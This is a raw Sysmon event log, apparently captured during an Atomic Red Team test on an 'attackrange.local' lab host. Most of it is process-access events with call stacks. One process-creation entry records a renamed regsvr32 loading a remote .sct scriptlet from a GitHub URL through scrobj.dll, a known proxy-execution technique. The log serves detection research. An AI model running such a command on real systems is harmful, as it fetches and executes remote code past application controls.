22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361433Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361432Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361431Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361430Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-3708-6013-b403-000000001100}4072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361429Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361428Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-3708-6013-b403-000000001100}4072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|UNKNOWN(00007FFC8EF99C27) 154100x8000000000000000361427Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.036{8e433fbf-3708-6013-b403-000000001100}4072C:\Windows\System32\cmd.exe10.0.18362.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Temp\notregsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=9D59442313565C2E0860B88BF32B2277,SHA256=D0CEB18272966AB62B8EDFF100E9B4A6A3CB5DC0F2A32B2B18721FEA2D9C09A5,IMPHASH=272245E2988E1E430500B852C4FB5E18{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000361426Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 13241300x8000000000000000361425Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:13:28.022{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 10341000x8000000000000000361424Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361423Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361422Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 11241100x8000000000000000361421Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-28 22:13:27.803 10341000x8000000000000000361420Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361419Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361418Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361417Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361416Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361415Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 11241100x8000000000000000361414Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-28 22:13:27.803 10341000x8000000000000000361413Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361412Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361411Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361410Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361409Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 